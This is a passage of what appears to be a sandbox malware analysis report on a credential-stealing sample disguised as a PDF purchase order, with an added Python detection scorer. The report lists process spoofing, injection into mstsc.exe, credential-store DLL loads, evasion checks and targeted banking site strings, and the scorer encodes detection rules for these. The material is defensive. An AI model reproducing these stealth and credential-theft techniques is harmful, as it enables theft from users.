            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\mstsc.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\mstsc.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
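Taken together, the "Process created", "Section loaded" and registry lines above describe the detection surface of this sample on a host with process, image-load and registry telemetry: a double-extension file on the desktop; svchost.exe started by a user-mode process with a command line that names a different executable (the spoofed argv[0] is visible in the second "Process created" line); mstsc.exe, which has no business reading browser password stores, loading winsqlite3.dll, vaultcli.dll and dpapi.dll and opening the Outlook profile key; and a browser spawned by mstsc.exe. The scorer below is an added example, not part of the Joe Sandbox report or of any vendor's rule set. It replays those events as a constructed event stream and attaches weighted findings to each pid; the pids, the parent of YKkstfciYBQ.exe and the weights are made up for illustration, the images, command lines, DLL names and registry key come from the report.

```python
import re
from collections import defaultdict

# Constructed event stream mirroring the report's process chain and the
# mstsc.exe module loads / registry access. pids and weights are illustrative.
YK_EXE = (r"C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH"
          r"\YKkstfciYBQ.exe")
EVENTS = [
    ("process", {"pid": 8, "ppid": 0, "image": r"C:\Windows\System32\services.exe", "cmdline": r"C:\Windows\System32\services.exe"}),
    ("process", {"pid": 7, "ppid": 8, "image": r"C:\Windows\System32\svchost.exe", "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"}),
    ("process", {"pid": 1, "ppid": 0, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"}),
    ("process", {"pid": 2, "ppid": 1, "image": r"C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", "cmdline": r'"C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"'}),
    ("process", {"pid": 3, "ppid": 2, "image": r"C:\Windows\SysWOW64\svchost.exe", "cmdline": r'"C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"'}),
    ("process", {"pid": 4, "ppid": 0, "image": YK_EXE, "cmdline": f'"{YK_EXE}"'}),
    ("process", {"pid": 5, "ppid": 4, "image": r"C:\Windows\SysWOW64\mstsc.exe", "cmdline": r'"C:\Windows\SysWOW64\mstsc.exe"'}),
    ("process", {"pid": 6, "ppid": 5, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'}),
    ("image_load", {"pid": 5, "module": "winsqlite3.dll"}),
    ("image_load", {"pid": 5, "module": "vaultcli.dll"}),
    ("image_load", {"pid": 5, "module": "dpapi.dll"}),
    ("registry", {"pid": 5, "key": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\"}),
]

DOUBLE_EXT_RE = re.compile(r"\.(?:pdf|doc|docx|xls|xlsx|ppt|pptx|rtf|txt|jpg|png|bat)\.(?:exe|scr|com|pif)$", re.I)
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
SYSTEM_HOSTS = {"svchost.exe", "mstsc.exe"}          # system binaries this sample hides in
CRED_DLLS = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"}  # browser DB + Credential Manager + DPAPI


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def argv0(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def analyze(events):
    """Return pid -> [(rule, weight)] for every pid that triggers at least one rule."""
    procs = {e["pid"]: e for kind, e in events if kind == "process"}
    image_of = lambda pid: basename(procs[pid]["image"]) if pid in procs else ""
    findings, loads = defaultdict(list), defaultdict(set)
    for kind, e in events:
        pid = e["pid"]
        if kind == "process":
            img, parent = image_of(pid), image_of(e["ppid"])
            if DOUBLE_EXT_RE.search(img):
                findings[pid].append(("double_extension", 3))
            if basename(argv0(e["cmdline"])) != img:       # image on disk != what the cmdline claims
                findings[pid].append(("argv0_image_mismatch", 4))
            if img == "svchost.exe" and parent != "services.exe":
                findings[pid].append(("svchost_unexpected_parent", 3))
            if img in BROWSERS and parent in SYSTEM_HOSTS:
                findings[pid].append(("browser_spawned_by_system_host", 2))
        elif kind == "image_load":
            loads[pid].add(e["module"].lower())
        elif kind == "registry":
            if "\\outlook\\profiles" in e["key"].lower() and image_of(pid) != "outlook.exe":
                findings[pid].append(("outlook_profile_access_from_non_outlook", 3))
    for pid, mods in loads.items():
        if len(mods & CRED_DLLS) >= 2 and image_of(pid) not in BROWSERS:
            findings[pid].append(("credential_store_dlls", 3))
    return dict(findings)


def score(events):
    return {pid: sum(w for _, w in rules) for pid, rules in analyze(events).items()}


def alerts(events, threshold=4):
    return sorted(pid for pid, s in score(events).items() if s >= threshold)


if __name__ == "__main__":
    for pid, rules in sorted(analyze(EVENTS).items()):
        print(pid, rules)
    print("alert pids:", alerts(EVENTS))
```

The argv[0] rule is the cheapest high-confidence signal here: Windows does not rewrite the command line when a process is created, so a svchost.exe whose command line is the path of a desktop executable can only come from a creator that wrote it on purpose. The legitimate services.exe-spawned svchost.exe in the stream scores zero, which is the control case any such rule should be checked against before deployment.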
            Source: PO-78140924.BAT.PDF.exe  Static file information: File size 1085440 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YKkstfciYBQ.exe, 00000003.00000000.2070305149.000000000077E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2042653624.0000000004540000.00000004.00001000.00020000.00000000.sdmp, PO-78140924.BAT.PDF.exe, 00000000.00000003.2041650984.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046417159.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048886154.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2170653792.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2164958755.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2042653624.0000000004540000.00000004.00001000.00020000.00000000.sdmp, PO-78140924.BAT.PDF.exe, 00000000.00000003.2041650984.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2046417159.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048886154.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2170653792.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2164958755.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mstsc.pdbGCTL source: svchost.exe, 00000002.00000003.2115002578.0000000007300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115127900.0000000007500000.00000004.00000020.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2094204761.0000000003D42000.00000004.00000001.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2093852104.0000000003C02000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000003EDC000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000004B1C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2459301249.000000003282C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mstsc.pdb source: svchost.exe, 00000002.00000003.2115002578.0000000007300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115127900.0000000007500000.00000004.00000020.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2094204761.0000000003D42000.00000004.00000001.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2093852104.0000000003C02000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000003EDC000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000004B1C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2459301249.000000003282C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_0019AAC0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect	0_2_0019AAC0
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_000243B7 push edi; ret	0_2_000243B9
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_000243CB push edi; ret	0_2_000243CD
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_0001C590 push eax; retn 0001h	0_2_0001C599
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_0003B947 push esi; ret	0_2_0003B949
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_0003B996 push edi; ret	0_2_0003B998
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_0003BA3C push edi; ret	0_2_0003BA3E
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_00038AC5 push ecx; ret	0_2_00038AD8
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404878 push edx; iretd	2_2_00404879
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004180CC push ss; iretd	2_2_004180D7
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004021FE push ecx; ret	2_2_004021FF
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413A18 push ebx; retf	2_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041221F push ss; ret	2_2_00412220
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413A23 push ebx; retf	2_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413A2E push ebx; retf	2_2_00413A2D
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004073CB push esi; ret	2_2_004073CE
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403380 push eax; ret	2_2_00403382
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040A623 push edi; retf	2_2_0040A62D
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418E2B push esi; ret	2_2_00418E2C
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E76A push ebp; retf	2_2_0041E858
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E71E push edx; iretd	2_2_0041E71F
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C309AD push ecx; mov dword ptr [esp], ecx	2_2_03C309B6
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe	Code function: 3_2_0639D02B push ss; iretd	3_2_0639D033
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe	Code function: 3_2_0639C732 push es; retf	3_2_0639C749
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe	Code function: 3_2_0639F3B4 push eax; ret	3_2_0639F3B6
            Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4_2_045209AD push ecx; mov dword ptr [esp], ecx	4_2_045209B6
            Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4_2_004A18CC push es; iretd	4_2_004A18C5
            Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4_2_00484048 push esi; ret	4_2_0048404B
            Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4_2_004872A0 push edi; retf	4_2_004872AA
            Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4_2_0049B3E7 push ebp; retf	4_2_0049B4D5
            Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4_2_0049B39B push edx; iretd	4_2_0049B39C
            Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4_2_004A043C push eax; ret	4_2_004A043D
            Source: initial sample	Static PE information: section name: UPX0
            Source: initial sample	Static PE information: section name: UPX1
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_00014A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput	0_2_00014A35
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_00033307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress	0_2_00033307
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	API/Special instruction interceptor: Address: 1712D54
            Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\mstsc.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAD1C0 rdtsc	2_2_03CAD1C0
            Source: C:\Windows\SysWOW64\mstsc.exe	Window / User API: threadDelayed 9839
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	API coverage: 8.9 %
            Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\mstsc.exe	API coverage: 3.1 %
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe TID: 5032	Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe TID: 5032	Thread sleep time: -34500s >= -30000s
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 1476	Thread sleep count: 134 > 30
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 1476	Thread sleep time: -268000s >= -30000s
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 1476	Thread sleep count: 9839 > 30
            Source: C:\Windows\SysWOW64\mstsc.exe TID: 1476	Thread sleep time: -19678000s >= -30000s
            Source: C:\Windows\SysWOW64\mstsc.exe	Last function: Thread delayed
            Source: C:\Windows\SysWOW64\mstsc.exe	Last function: Thread delayed
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_0007449B GetFileAttributesW,FindFirstFileW,FindClose	0_2_0007449B
            Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 4_2_0049C460 FindFirstFileW,FindNextFileW,FindClose	4_2_0049C460
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_00014AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo	0_2_00014AFE
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696428655j
            Source: 2348427.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: merica.comVMware20,11696428655|UE
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CDYNVMware20,11696428655p
            Source: 2348427.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 2348427.4.dr	Binary or memory string: discord.comVMware20,11696428655f
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EU WestVMware20,1169642%
            Source: 2348427.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 2348427.4.dr	Binary or memory string: global block list test formVMware20,11696428655
            Source: 2348427.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ca.comVMware20,11696428655x
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,1169642
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,1169642r
            Source: 2348427.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: actistorage_key EU WestVMware20,1169642%
            Source: 2348427.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 2348427.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 2348427.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 2348427.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 2348427.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 2348427.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 2348427.4.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 2348427.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 00000006.00000002.2463739189.000001D7B271C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 2348427.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 2348427.4.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,116964286
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nteractive Brokers - HKVMware20,11696428655]
            Source: 2348427.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 2348427.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 2348427.4.dr	Binary or memory string: AMC password management pageVMware20,11696428655
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ive Brokers - NDCDYNVMware20,11696428655z
            Source: 2348427.4.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: mstsc.exe, 00000004.00000002.3899490004.00000000076EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20D
            Source: 2348427.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 2348427.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 2348427.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 2348427.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 2348427.4.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 2348427.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: YKkstfciYBQ.exe, 00000003.00000002.3897025898.00000000008EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
            Source: 2348427.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: mstsc.exe, 00000004.00000002.3896033202.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
            Source: 2348427.4.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 2348427.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 2348427.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	API call chain: ExitProcess graph end node	graph_0-35511
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	API call chain: ExitProcess graph end node	graph_0-36204
            Source: C:\Windows\SysWOW64\svchost.exe	Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort
            Source: C:\Windows\SysWOW64\mstsc.exe	Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAD1C0 rdtsc	2_2_03CAD1C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004176F3 LdrLoadDll	2_2_004176F3
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_0004B441 IsDebuggerPresent,OutputDebugStringW	0_2_0004B441
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_00045BFC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer	0_2_00045BFC
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe	Code function: 0_2_0019AAC0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect	0_2_0019AAC0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h]	2_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]	2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]	2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h]	2_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEB3D0 mov ecx, dword ptr fs:[00000030h]	2_2_03CEB3D0
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEF3E6 mov eax, dword ptr fs:[00000030h]	2_2_03CEF3E6
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D053FC mov eax, dword ptr fs:[00000030h]	2_2_03D053FC
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]	2_2_03C403E9
